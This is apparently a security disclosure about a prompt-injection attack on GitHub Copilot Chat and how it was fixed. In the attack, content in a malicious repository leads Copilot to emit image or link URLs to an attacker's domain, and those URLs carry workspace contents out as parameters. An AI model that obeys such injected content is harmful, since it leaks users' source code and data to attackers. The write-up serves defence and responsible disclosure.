Source Code and data exfiltration via Github Copilot

Due to insecure output handling in Copilot client interfaces, a prompt injection initiated attack was able to result in data exfiltration in a number of ways. A user that was prompt injected, by running Copilot Chat in a specific manner on an untrusted repository, could have generated arbitrary image links pointing to an attacker controlled domain that would be rendered in the Copilot Chat interface, allowing for data exfiltration via URL parameters. This attack could potentially have allowed a compromised Copilot session (Copilot Chat being called on a malicious cloned local repository) to exfiltrate the contents of the same workspace to the malicious domain. Other risky behaviors that were also noted was that links could be created to attacker controlled domains via Copilot, which would not be immediately apparent to end users, causing another avenue for data exfiltration which required more user interaction, lowering the severity. This vulnerability was addressed by only rendering images from trusted domains, and by adding interstitial modals to let users know where links pointed. GitHub also hardened the rendering specification for all Copilot clients to ensure that the context provided to Copilot is made more apparent to end users to mitigate the impact of unseen content affecting the output of Copilot.